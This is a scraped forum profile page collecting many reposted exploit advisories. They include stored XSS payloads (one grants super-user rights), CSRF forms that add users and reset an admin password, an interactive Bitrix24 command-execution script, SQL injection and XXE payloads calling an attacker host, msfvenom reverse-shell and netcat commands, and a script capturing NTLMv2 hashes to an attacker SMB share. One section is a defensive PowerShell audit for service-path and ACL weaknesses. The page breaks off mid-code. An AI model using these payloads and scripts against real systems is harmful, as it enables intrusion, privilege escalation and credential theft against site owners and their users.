
Everything posted by HireHackking
-
WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
# Exploit Title: WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 2022-04-13
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: http://www.a-j-evolution.com/
# Software Link: https://downloads.wordpress.org/plugin/video-synchro-pdf.1.7.4.zip
# Category: Web Application
# Version: 1.7.4
# Tested on: CentOS / WordPress 5.9.3
# CVE : N/A

# 1. Technical Description:
The plugin does not properly sanitize the nom, pdf, mp4, webm and ogg parameters, allowing potentially dangerous characters to be inserted. This includes the reported payload, which triggers a persistent Cross-Site Scripting (XSS).

# 2. Proof of Concept (PoC):
a. Install and activate version 1.7.4 of the plugin.
b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=aje_videosyncropdf_videos).
c. Open the "Video example" or create a new one (whichever you prefer).
d. Change or add in some of the displayed fields (Name, PDF file, MP4 video, WebM video or OGG video) the following payload: " autofocus onfocus=alert(/XSS/)>
e. Save the changes ("Edit" button).
f. JavaScript will be executed and a popup with the text "XSS" will be displayed.

Note: This change will be permanent until you modify the edited field.
-
ManageEngine ADSelfService Plus 6.1 - User Enumeration
# Exploit Title: ManageEngine ADSelfService Plus 6.1 - User Enumeration
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: ADSelfService 6.1 Build 6121
# Tested Against: Build 6118 - 6121
# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md

#!/usr/bin/python3
import requests
import sys
import time
import urllib3
from urllib3.exceptions import InsecureRequestWarning

"""
The domain users can be enumerated like userenum module of the kerbrute tool using this exploit.
If you conducted a brute-force attack against a user, please run the script after 30 minutes (default settings) otherwise the results can be false positive.
"""

def request(target, user):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    url = target + 'ServletAPI/accounts/login'
    data = {"loginName": user}
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
    req = requests.post(url, data=data, headers=headers, verify=False)
    # For debugging
    # print("[*] Response for " + user + ": " + req.text.strip())
    if 'PASSWORD' in req.text:
        print("[+] " + user + " is VALID!")
    elif 'Your account has been disabled' in req.text:
        print("[+] " + user + " account has been DISABLED.")
    elif 'Your account has expired' in req.text:
        print("[+] " + user + " account has EXPIRED.")
    elif 'Enter the text as shown in the image.' in req.text:
        print("[!] The exploit doesn't detect expired and disabled users. Please, run it after the 30 minutes. ")
    elif 'Permission Denied.' in req.text:
        print("[-] " + user + " is not found.")

def get_users(target, file):
    try:
        file = open(file, "r")
        for line in file:
            line = line.strip()
            time.sleep(0.5)
            request(target, user=line)
    except FileNotFoundError:
        print("[-] File not found!")
        sys.exit(1)

def main(args):
    if len(args) != 3:
        print("[*] Usage: %s url usernames_file" % (args[0]))
        print("[*] Example: %s https://target/ /tmp/usernames.txt" % (args[0]))
        sys.exit(1)
    get_users(target=args[1], file=args[2])

if __name__ == "__main__":
    main(args=sys.argv)
-
REDCap 11.3.9 - Stored Cross Site Scripting
# Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting
# Date: 2021-10-11
# Exploit Author: Kendrick Lam
# References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js
# Vendor Homepage: https://projectredcap.org
# Software Link: https://projectredcap.org
# Version: Redcap before 11.4.0
# Tested on: 11.2.5
# CVE: CVE-2021-42136
# Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf

### Stored XSS – Missing Data Code Value (found by Kendrick Lam)
It was possible to store JavaScript as values for Missing Data Codes.

- Where: Missing Data Code.
- Payload:

<script>
var target = document.location.host;
var csrf_token = csrf_token;
var userId = '<userId>'; // Replace with your user ID.

function privesc() {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xhr.setRequestHeader("Sec-Fetch-Dest", "empty");
    xhr.withCredentials = "true";
    var body = "";
    body += "userid=" + userId + "&attrs=admin_rights%2Csuper_user%2Caccount_manager%2Caccess_system_config%2Caccess_system_upgrade%2Caccess_external_module_install%2Caccess_admin_dashboards&csrf_token=" + csrf_token;
    xhr.send(body);
    return true;
}
privesc();
</script>

- Details: The payload will escalate a regular user's privileges, if viewed by an account with permission to change privileges (such as an administrator).
- Privileges: Low privileged / regular user
- Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
- Privileges:
  + Store: Low privileged user is able to store Missing Data Code values.
  + Execute: Any authenticated user.

The payload will trigger once the page loads; this means storing the payload and sending over the link to an administrator would be able to escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
-
WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)
# Exploit Title: WordPress Plugin Popup Maker <1.16.5 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2022-03-03
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://wppopupmaker.com
# Software Link: https://downloads.wordpress.org/plugin/popup-maker.1.16.4.zip
# Version: <1.16.5
# Tested on: WordPress 5.9 on Ubuntu 20.04

1. Description:
----------------------
WordPress Plugin Popup Maker <1.16.5 does not sanitise and escape some of its popup settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

2. Proof of Concept:
----------------------
Create Popup > Popup Settings > Triggers > Add New Cookie > Add > Cookie Time (overwrite the default '1 month' with XSS payload)
Click 'Add', which triggers the XSS payload.

Payload examples:
<script>alert('XSS');</script>
<img src=x onerror=alert('XSS')>
-
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
# Exploit Author: LiquidWorm

<!DOCTYPE html>
<html>
<head><title>enteliTouch XSS</title></head>
<body>
<!--

Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)

Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
                  3.40.3706
                  3.33.4005

Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS.

Desc: Input passed to the POST parameter 'Username' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML code in a user's browser session in context of an affected site.

Tested on: DELTA enteliTOUCH

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5703
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php

06.04.2022

-->
<form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST">
  <input type="hidden" name="userInfo" value="" />
  <input type="hidden" name="UL_SelectedOptionId" value="" />
  <input type="hidden" name="Username" value=""></script><script>alert(document.cookie)</script>" />
  <input type="hidden" name="formAction" value="Delete" />
  <input type="submit" value="CSRF XSS Alert!" />
</form>
</body>
</html>
-
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
# Exploit Author: LiquidWorm

<!DOCTYPE html>
<html>
<head><title>enteliTouch CSRF</title></head>
<body>
<!--

Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF)

Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
                  3.40.3706
                  3.33.4005

Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS.

Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Tested on: DELTA enteliTOUCH

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5702
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php

06.04.2022

-->
CSRF Add User:
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST">
  <input type="hidden" name="actionName" value="" />
  <input type="hidden" name="Username" value="zsl" />
  <input type="hidden" name="Password" value="123t00t" />
  <input type="hidden" name="AutoLogout" value="17" />
  <input type="hidden" name="SS_SelectedOptionId" value="FIL28" />
  <input type="hidden" name="ObjRef" value="" />
  <input type="hidden" name="Apply" value="true" />
  <input type="hidden" name="formAction" value="Add" />
  <input type="submit" value="Go for UserAdd" />
</form>
<br />
CSRF Change Admin Password (default: delta:login):
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST">
  <input type="hidden" name="actionName" value="" />
  <input type="hidden" name="Username" value="DELTA" />
  <input type="hidden" name="Password" value="123456" />
  <input type="hidden" name="AutoLogout" value="30" />
  <input type="hidden" name="SS_SelectedOptionId" value="" />
  <input type="hidden" name="ObjRef" value="ZSL-251" />
  <input type="hidden" name="Apply" value="true" />
  <input type="hidden" name="formAction" value="Edit" />
  <input type="submit" value="Go for UserEdit" />
</form>
</body>
</html>
-
Bitrix24 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated)
# Date: 4/22/2022
# Exploit Author: picaro_o
# Vendor Homepage: https://www.bitrix24.com/apps/desktop.php
# Tested on: Linux os

#!/usr/bin/env python
# Created by heinjame
import requests
import re
from bs4 import BeautifulSoup
import argparse, sys

user_agent = {'User-agent': 'HeinJame'}
parser = argparse.ArgumentParser()
parser.add_argument("host", help="Bitrix URL")
parser.add_argument("uname", help="Bitrix Username")
parser.add_argument("pass", help="Bitrix Password")
pargs = parser.parse_args()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
inputcmd = input(">>")
s = requests.Session()

def login():
    postdata = {'AUTH_FORM': 'Y', 'TYPE': 'AUTH', 'backurl': '%2Fstream%2F', 'USER_LOGIN': username, 'USER_PASSWORD': password}
    r = s.post(url + "/stream/?login=yes", headers=user_agent, data=postdata)

def getsessionid():
    sessionid = s.get(url + "bitrix/admin/php_command_line?lang=en", headers=user_agent)
    session = re.search(r"'bitrix_sessid':.*", sessionid.text)
    extract = session.group(0).split(":")
    realdata = extract[1].strip(" ")
    realdata = realdata.replace("'", "")
    realdata = realdata.replace(",", "")
    return realdata
    # print(r.text)

def cmdline(cmd, sessionid):
    cmdline = {'query': "system('" + cmd + "');", 'result_as_text': 'n', 'ajax': 'y'}
    usercmd = s.post(url + "bitrix/admin/php_command_line.php?lang=en&sessid=" + sessionid, headers=user_agent, data=cmdline)
    soup = BeautifulSoup(usercmd.content, 'html.parser')
    cmd = soup.find('p').getText()
    print(cmd.rstrip())

login()
sessionid = getsessionid()
while inputcmd != "exit":
    cmdline(inputcmd, sessionid)
    inputcmd = input(">>")
-
Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure
Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure
Exploit Author: LiquidWorm

Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
                  3.40.3706
                  3.33.4005

Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS.

Desc: The application suffers from a cleartext transmission/storage of sensitive information in a Cookie. This allows a remote attacker to intercept the HTTP Cookie authentication credentials through a man-in-the-middle attack.

Tested on: DELTA enteliTOUCH

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2022-5704
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5704.php

06.04.2022

--

GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1
Host: 192.168.0.210
Cache-Control: max-age=0
User-Agent: Toucher/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.210/deltaweb/hmi_userconfig.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Previous=; lastLoaded=; LastUser=DELTA; LogoutTime=10; UserInstance=1; UserName=DELTA; Password=LOGIN; LastGraphic=; LastObjRef=; AccessKey=DADGGEOFNILEJMBBCNDKFNJPHPPJDAEDGEBJACPEAPBHDCGPCAGNNDEOJIJEOPPLOEKCFMAFNHDJPHGACMDFMPFDNONPIJAHBBNAAIDMDHCCPMAJDELDNLOPBPDCKELJADDKICPMMPCNEOMBHMKIIBJHFAJKNKJFGDEOLPMGMNBEHFLNEDIFMJKMCJKBHPGGEMHJJGMOMAECDKDIIKGNDDGANIHDKPNACLMANGJAOBDNJCFGEIHIJICLPGOFFMDOOLOJCJPAPPKOJFCKFAHDDAGNLCAHKKKGHCBODHBNDCOECGHG
Connection: close
-
CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
# Exploit Title: CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
# Date: 2021-04-22
# Exploit Author: Dogukan Dincer
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Version: 1.3.0
# Tested on: Kali Linux, Windows 10, PHP 7.2.4, Apache 2.4

# Discovery of Vulnerability
- First go to CSZ CMS web page
- then go to http://yourhost/plugin/article directory on CMS.
- To see the error-based SQLi vulnerability, the ' character is entered in the search section.
- It is determined that the "p" parameter creates the vulnerability.
- Databases can be accessed with manual or automated tools.

# Proof of Concept
http://127.0.0.1/csz-cms/plugin/article/search?p=1'") UNION ALL SELECT CONCAT(0x717a7a6b71,0x5449414d6c63596c746759764a614d64727476796366686f4e6a7a474c4a414d6b616a4269684956,0x716a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

# Sqlmap output:
Parameter: p (GET)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: p=1'") AND EXTRACTVALUE(8555,CONCAT(0x5c,0x717a7a6b71,(SELECT (ELT(8555=8555,1))),0x716a717a71))-- OUUO

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=1'") AND (SELECT 3910 FROM (SELECT(SLEEP(5)))qIap)-- ogLS
-
SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
# Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
# Google Dork: N/A
# Date: 4/21/2022
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.sap.com/
# Software Link: https://www.sap.com/
# Version: 4.2 and 4.3
# Tested on: Windows Server 2019 x64
# CVE : CVE-2022-28213
# References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md

curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \
  --data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \
  https://example.com/biprws/logon/long
-
Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
# Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
# Date: 04/25/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://drfone.wondershare.com/
# Software Link: https://download.wondershare.com/drfone_full3360.exe
# Version: 11.4.10
# Tested on: Windows 10 64-bit
# Note: The application folder "Wondershare Dr.Fone" may be different (e.g. it will be "drfone" if we download the installer from the Italian website)

# Description:
The application "Wondershare Dr. Fone" comes with 3 services:
1. DFWSIDService
2. ElevationService
3. Wondershare InstallAssist

All the folders that contain the binaries for the services have weak permissions.
These weak permissions allow any authenticated user to get SYSTEM privileges.

First, we need to check if services are running using the following command:

wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare

Wondershare WSID help                    DFWSIDService              C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe                             Auto  LocalSystem  Running
Wondershare Driver Install Service help  ElevationService           C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe  Auto  LocalSystem  Running
Wondershare Install Assist Service       Wondershare InstallAssist  C:\ProgramData\Wondershare\Service\InstallAssistService.exe                                        Auto  LocalSystem  Running

Now we need to check if we have enough privileges to replace the binaries:

icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone"
Everyone:(OI)(CI)(F)   <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit)
...

icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps"
Everyone:(I)(OI)(CI)(F)   <= same here
...

icacls "C:\ProgramData\Wondershare\Service"
Everyone:(I)(OI)(CI)(F)   <= and here
...

# Proof of Concept:
1. Create an exe file with the name of the binary we want to replace (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help")
2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\)
3. After replacing the binary, wait for the next reboot (unless the service can be restarted manually)

As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener:

simple payload:
msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe

listener:
nc -nlvp <YOUR_PORT>
-
TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path
# Exploit Title: TCQ - 'ITeCProteccioAppServer.exe' Unquoted Service Path
# Discovery by: Edgar Carrillo Egea - https://twitter.com/ecarrilloeg
# Discovery Date: 2022-04-25
# Vendor Homepage: https://itec.es/programas/
# Vulnerability Type: Unquoted Service Path Privilege Escalation
# Tested on OS: Microsoft Windows 11 Home

To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges.

C:\Users\edgar>sc qc "ITeCProteccioAppServer"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ITeCProteccioAppServer
        TIPO               : 110  WIN32_OWN_PROCESS (interactive)
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : ITeCProteccioAppServer
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem

C:\Users\edgar>systeminfo
Nombre de host:                            DESKTOP-0DL5SID
Nombre del sistema operativo:              Microsoft Windows 11 Home
Versión del sistema operativo:             10.0.22000 N/D Compilación 22000
-
UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path
# Exploit Title: UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path
# Discovery by: Edgar Carrillo Egea // https://twitter.com/ecarrilloeg
# Discovery Date: 2022-04-24
# Vendor Homepage: https://www.zte.com.cn/global/
# Tested Version: 2.0.3.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64

# Step to discover Unquoted Service Path:

C:\Users\edgar>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
UDisk Monitor Z5 Phone  UDisk Monitor Z5 Phone  C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe  Auto

C:\Users\edgar>sc qc "UDisk Monitor Z5 Phone"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: UDisk Monitor Z5 Phone
        TIPO               : 110  WIN32_OWN_PROCESS (interactive)
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : UDisk Monitor Z5 Phone
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

C:\Users\edgar>systeminfo
Nombre de host:                            DESKTOP-810865D
Nombre del sistema operativo:              Microsoft Windows 10 Pro
Versión del sistema operativo:             10.0.19044 N/D Compilación 19044
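An audit and remediation script for the two service weaknesses in the posts above (the unquoted service paths in the TCQ and UDisk posts, and the Everyone:(F) directory ACLs in the Dr.Fone post). This is an added example written for this page, not code from any of those advisories; the function names are my own, and it reads the live service configuration of the machine it runs on, so run it in an elevated PowerShell session.

```powershell
# Added example (not part of the advisories above): find services whose ImagePath is
# unquoted and contains a space, find LocalSystem services whose binary directory is
# writable by broad principals, and quote an ImagePath as the fix. Function names are
# hypothetical; everything else is read from the local registry, CIM and file ACLs.

function Get-UnquotedServicePaths {
    # Same check as the wmic/sc qc output in the posts, taken from the registry
    # (the authoritative source of ImagePath), minus binaries under C:\Windows.
    Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\*' -ErrorAction SilentlyContinue |
        Where-Object { $_.ImagePath -and $_.ImagePath -notmatch '^\s*"' } |
        Where-Object {
            # Drop any arguments after the .exe, then look for a space in the binary path itself
            $exe = ($_.ImagePath -split '\.exe', 2)[0] + '.exe'
            ($exe -match '\s') -and ($exe -notmatch '^\s*(\\\?\?\\)?(%SystemRoot%|C:\\Windows)')
        } |
        Select-Object PSChildName, ImagePath, Start, ObjectName
}

function Test-WeakDirectoryAcl {
    # Reports Allow ACEs that give broad principals write/modify/full rights,
    # i.e. the "Everyone:(OI)(CI)(F)" rows shown by icacls in the Dr.Fone post.
    param([Parameter(Mandatory)][string]$Path)
    $broad = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($broad -contains $_.IdentityReference.Value) -and
        (($_.FileSystemRights -band $writeMask) -ne 0)
    } | ForEach-Object {
        [pscustomobject]@{ Path = $Path; Identity = $_.IdentityReference.Value; Rights = $_.FileSystemRights }
    }
}

function Get-WritableServiceDirectories {
    # Every service that runs as LocalSystem: check the directory holding its binary.
    foreach ($svc in Get-CimInstance Win32_Service | Where-Object { $_.PathName -and $_.StartName -eq 'LocalSystem' }) {
        $exe = [regex]::Match($svc.PathName, '^"?([^"]+?\.exe)', 'IgnoreCase').Groups[1].Value
        if (-not $exe) { continue }
        foreach ($finding in (Test-WeakDirectoryAcl -Path (Split-Path -Parent $exe))) {
            [pscustomobject]@{ Service = $svc.Name; Path = $finding.Path; Identity = $finding.Identity; Rights = $finding.Rights }
        }
    }
}

function Repair-UnquotedServicePath {
    # Remediation: wrap the executable part of ImagePath in quotes and keep any arguments.
    param([Parameter(Mandatory)][string]$ServiceName)
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$ServiceName"
    $path = (Get-ItemProperty -Path $key).ImagePath
    if ($path -match '^\s*"') { return $path }          # already quoted, nothing to do
    $m = [regex]::Match($path, '^(.+?\.exe)(.*)$', 'IgnoreCase')
    if (-not $m.Success) { throw "Cannot locate the executable in ImagePath: $path" }
    $fixed = '"' + $m.Groups[1].Value + '"' + $m.Groups[2].Value
    Set-ItemProperty -Path $key -Name ImagePath -Value $fixed
    return $fixed
}

Get-UnquotedServicePaths      | Format-Table -AutoSize
Get-WritableServiceDirectories | Format-Table -AutoSize
```

Quoting the path fixes the unquoted-path class only; the weak-ACL findings need the vendor directory's permissions reset (for example with icacls /reset or an explicit grant to Administrators and SYSTEM) so that non-administrators can no longer replace the service binary.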
-
ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure
# Exploit Title: ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Details: https://docs.unsafe-inline.com/0day/multiple-manageengine-applications-critical-information-disclosure-vulnerability
# Version: ADSelfService Plus Build < 6121
# Tested against: Build 6118
# CVE: CVE-2022-29457

#!/usr/bin/python3
import argparse
import requests
import urllib3
import random
import sys

"""
1- a) Set up SMB server to capture NTMLv2 hash.
      python3 smbserver.py share . -smb2support
   b) For relaying to SMB:
      python3 ntlmrelayx.py -smb2support -t smb://TARGET
   c) For relaying to LDAP:
      python3 ntlmrelayx.py -t ldaps://TARGET
2- Fire up the exploit. You will obtain the NTLMv2 hash of user/computer account that runs the ADSelfService in five minutes.
"""

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def get_args():
    parser = argparse.ArgumentParser(
        epilog="Example: exploit.py -t https://Target/ -l Listener-IP -a adselfservice -d unsafe.local -u operator1 -p operator1")
    parser.add_argument('-d', '--domain', required=True, action='store', help='DNS name of the target domain. ')
    parser.add_argument('-a', '--auth', required=True, action='store',
                        help='If you have credentials of the application user, type adselfservice. If you have credentials of the domain user, type domain')
    parser.add_argument('-u', '--user', required=True, action='store')
    parser.add_argument('-p', '--password', required=True, action='store')
    parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
    parser.add_argument('-l', '--listener', required=True, action='store', help='Listener IP to capture NTLMv2 hash')
    args = parser.parse_args()
    return args

def scheduler(domain, auth, target, listener, user, password):
    try:
        with requests.Session() as s:
            gUrl = target
            getCsrf = s.get(url=gUrl, allow_redirects=False, verify=False)
            csrf = getCsrf.cookies['_zcsr_tmp']
            print("[*] Csrf token: %s" % getCsrf.cookies['_zcsr_tmp'])
            if auth.lower() == 'adselfservice':
                auth = "ADSelfService Plus Authentication"
            data = {
                "loginName": user,
                "domainName": auth,
                "j_username": user,
                "j_password": password,
                "AUTHRULE_NAME": "ADAuthenticator",
                "adscsrf": [csrf, csrf]
            }
            # Login
            url = target + "j_security_check"
            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
            req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False)
            # Auth Check
            url2 = target + "webclient/index.html"
            req2 = s.get(url2, headers=headers, allow_redirects=False, verify=False)
            if req2.status_code == 200:
                print("[+] Authentication is successful.")
            elif req2.status_code == 302:
                print("[-] Login failed.")
                sys.exit(1)
            else:
                print("[-] Something went wrong")
                sys.exit(1)
            dn = domain.split(".")
            r1 = random.randint(1, 1000)
            surl = target + 'ServletAPI/Reports/saveReportScheduler'
            data = {
                'SCHEDULE_ID': '0',
                'ADMIN_STATUS': '3',
                'SCHEDULE_NAME': 'enrollment' + str(r1),
                'DOMAINS': '["' + domain + '"]',
                'DOMAIN_PROPS': '{"' + domain + '":{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC=' + dn[0] + ',DC=' + dn[1] + '","DOMAIN_SELECTED_OUS_GROUPS":{"ou":[{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC=' + dn[0] + ',DC=' + dn[1] + '","NAME":"' + domain + '"}]}}}',
                'SELECTED_REPORTS': '104,105',
                'SELECTED_REPORT_LIST': '[{"REPORT_CATEGORY_ID":"3","REPORT_LIST":[{"CATEGORY_ID":"3","REPORT_NAME":"adssp.reports.enroll_rep.enroll.heading","IS_EDIT":false,"SCHEDULE_ELEMENTS":[],"REPORT_ID":"104"},{"CATEGORY_ID":"3","REPORT_NAME":"adssp.common.text.non_enrolled_users","IS_EDIT":true,"SCHEDULE_ELEMENTS":[{"DEFAULT_VALUE":false,"size":"1","ELEMENT_VALUE":false,"uiText":"adssp_reports_enroll_rep_non_enroll_show_notified","name":"SHOW_NOTIFIED","id":"SHOW_NOTIFIED","TYPE":"checkbox","class":"grayfont fntFamily fntSize"}],"REPORT_ID":"105"}],"REPORT_CATEGORY_NAME":"adssp.xml.reportscategory.enrollment_reports"}]',
                'SCHEDULE_TYPE': 'hourly',
                'TIME_OF_DAY': '0',
                'MINS_OF_HOUR': '5',
                'EMAIL_ID': user + '@' + domain,
                'NOTIFY_ADMIN': 'true',
                'NOTIFY_MANAGER': 'false',
                'STORAGE_PATH': '\\\\' + listener + '\\share',
                'FILE_FORMAT': 'HTML',
                'ATTACHMENT_TYPE': 'FILE',
                'ADMIN_MAIL_PRIORITY': 'Medium',
                'ADMIN_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_sub',
